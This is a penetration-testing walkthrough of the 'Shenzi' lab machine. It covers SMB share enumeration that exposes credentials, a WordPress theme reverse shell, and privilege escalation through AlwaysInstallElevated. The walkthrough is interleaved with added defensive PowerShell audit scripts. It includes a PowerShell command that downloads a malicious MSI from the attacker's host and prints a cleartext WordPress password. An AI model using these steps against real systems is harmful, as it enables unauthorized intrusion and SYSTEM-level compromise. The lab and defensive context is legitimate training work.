1. Reconnaissance
Let's begin with the initial nmap enumeration:
┌──(kali㉿kali)-[/home/Tools/nmapAutomator/192.168.179.55]
./nmapAutomator.sh 192.168.179.55 all
Running all scans on 192.168.179.55
Host is likely running Unknown OS!
———————Starting Port Scan———————–
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
———————Starting Script Scan———————–
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.179.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.179.55/dashboard/
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host ‘192.168.45.160’ is not allowed to connect to this MariaDB server
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-03T02:14:47
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: -1s
OS Detection modified to: Windows
———————Starting Full Scan————————
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5040/tcp open unknown
7680/tcp open pando-pub
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Making a script scan on extra ports: 5040, 7680, 49664, 49665, 49666, 49667, 49668, 49669
PORT STATE SERVICE VERSION
5040/tcp open unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
———————-Starting UDP Scan————————
No UDP ports are open
2. Enumeration
Next, let's enumerate the SMB service.

We can see a share called "Shenzi"; let's check out its contents.
The password.txt file contains some useful and sensitive information:
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
5) WordPress:
User: admin
Password: FeltHeadwallWight357
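From the defender's side, the problem in this step is a share readable by broad principals that holds cleartext credentials. The PowerShell audit below is added here and is not part of the original writeup; it assumes the built-in SmbShare module (Windows 8 / Server 2012 and later), local administrator rights on the file server, and a file-name heuristic and list of broad principals that are my own choices.

```powershell
# Added audit script (not from the writeup): report SMB shares on this host that
# grant access to broad principals and contain credential-looking files such as
# the password.txt found in the "Shenzi" share.

# Assumed list of principals that should never have access to a sensitive share.
$BroadPrincipals = @('Everyone', 'ANONYMOUS LOGON', 'Authenticated Users', 'Users', 'Guest')
# Assumed file-name heuristic for cleartext credential material.
$CredentialPattern = '(?i)(pass(word|wd)?|cred|secret|\.kdbx$)'

function Get-ExposedShareFinding {
    [CmdletBinding()]
    param(
        # Hidden admin shares are skipped; ACLs on those are managed by Windows itself.
        [string[]]$ExcludeShare = @('ADMIN$', 'IPC$', 'print$')
    )
    Get-SmbShare |
        Where-Object { $_.Name -notin $ExcludeShare -and $_.Name -notmatch '^[A-Z]\$$' } |
        ForEach-Object {
            $share = $_
            # Keep only Allow entries granted to one of the broad principals.
            $broadAccess = @(Get-SmbShareAccess -Name $share.Name | Where-Object {
                $entry = $_
                $entry.AccessControlType -eq 'Allow' -and
                @($BroadPrincipals | Where-Object { $entry.AccountName -like "*$_" }).Count -gt 0
            })
            if ($broadAccess.Count -eq 0) { return }   # acts as "continue" inside ForEach-Object

            # Walk the share's backing directory for credential-looking files.
            $files = Get-ChildItem -Path $share.Path -Recurse -File -ErrorAction SilentlyContinue |
                Where-Object { $_.Name -match $CredentialPattern }
            foreach ($f in $files) {
                [pscustomobject]@{
                    Share     = $share.Name
                    Path      = $f.FullName
                    GrantedTo = ($broadAccess.AccountName -join ', ')
                    Access    = ($broadAccess.AccessRight -join ', ')
                }
            }
        }
}

# Usage (run elevated on the file server):
#   Get-ExposedShareFinding | Format-Table -AutoSize
# Remediation for a Shenzi-style exposure: remove or encrypt the file, then tighten the share ACL, e.g.
#   Revoke-SmbShareAccess -Name Shenzi -AccountName Everyone -Force
```

The script only inspects share-level permissions; NTFS permissions on the underlying folder can further restrict or widen access, so a finding here is a prompt to review both layers. For detection of reads like the one in this writeup, enable object access auditing for file shares so that Security events 5140 (share accessed) and 5145 (share object checked) record which account read password.txt and from where.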
I tried to use feroxbuster to find some useful directories, but it was useless and found nothing.

But we can use the collected credentials to access http://192.168.179.55/shenzi, where we find a webpage.

Next, we log in to /wp-admin/ using the "FeltHeadwallWight357" credentials.

3. Foothold
Because this is a WordPress box, we can edit the theme here, then create a reverse shell using msfvenom.
Modifying the WordPress PHP script:

Next, let's modify the code and trigger the payload.

4. Privilege Escalation
Nice, port 445 successfully received a reverse shell.

Then, having a foothold on the target machine, we run winpeas.exe to enumerate further.
It found AlwaysInstallElevated set to 1 for the current user.

(New-Object System.Net.WebClient).DownloadFile("http://192.168.45.230/reverse.msi", "C:\Users\shenzi\Desktop\reverse.msi")
The picture above means that we are allowed to run any .msi file with SYSTEM privileges. We can create another reverse shell payload with msfvenom as an .msi file.
Refer: https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
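The misconfiguration behind this step is a pair of registry values, and it is only exploitable when both the machine-wide and the per-user value are 1. The PowerShell script below is an added example for defenders, not code from the writeup: it reports the state of both values, removes them on request, and lists recent MSI installations from the Application log so an unexpected package install like the one above stands out. It assumes local administrator rights; the HKCU check only covers the account running the script, so on a shared host repeat it per user or check the effective GPO result instead.

```powershell
# Added example (not from the writeup): audit, remediate and review evidence for
# the AlwaysInstallElevated misconfiguration.

# Both values must be 1 for Windows Installer to run every MSI as SYSTEM.
$AieKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($key in $AieKeys) {
        $value = $null
        if (Test-Path $key) {
            # Returns $null when the value does not exist, which is the secure default.
            $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $state[$key] = $value
    }
    [pscustomobject]@{
        MachineValue = $state[$AieKeys[0]]
        UserValue    = $state[$AieKeys[1]]
        # A single value set to 1 is not enough; the policy needs both halves.
        Exploitable  = ($state[$AieKeys[0]] -eq 1 -and $state[$AieKeys[1]] -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Deleting the values restores the default (installs run with the caller's rights).
    foreach ($key in $AieKeys) {
        if (Test-Path $key) {
            Remove-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        }
    }
    Get-AlwaysInstallElevatedState
}

function Get-RecentMsiInstall {
    param([int]$Days = 7)
    # MsiInstaller logs event 11707 when an installation completes; an install
    # outside a change window, or of a package nobody recognises, deserves a look.
    Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MsiInstaller'
        Id           = 11707
        StartTime    = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'User'; e = { $_.UserId } }, Message
}

$before = Get-AlwaysInstallElevatedState
$before | Format-List
if ($before.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is set for machine and user: any MSI runs as SYSTEM.'
    # Uncomment to remediate immediately; otherwise fix it through Group Policy.
    # Disable-AlwaysInstallElevated | Format-List
}
Get-RecentMsiInstall | Format-Table -AutoSize
```

For ongoing detection rather than a one-off audit, alert on process creation events (Sysmon event 1 or Security event 4688) where msiexec.exe runs with a package path under a user-writable location such as a Desktop or Downloads folder, which is exactly the pattern in the download command above.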

Finally, we got a reverse shell. Nice, it has admin permissions!
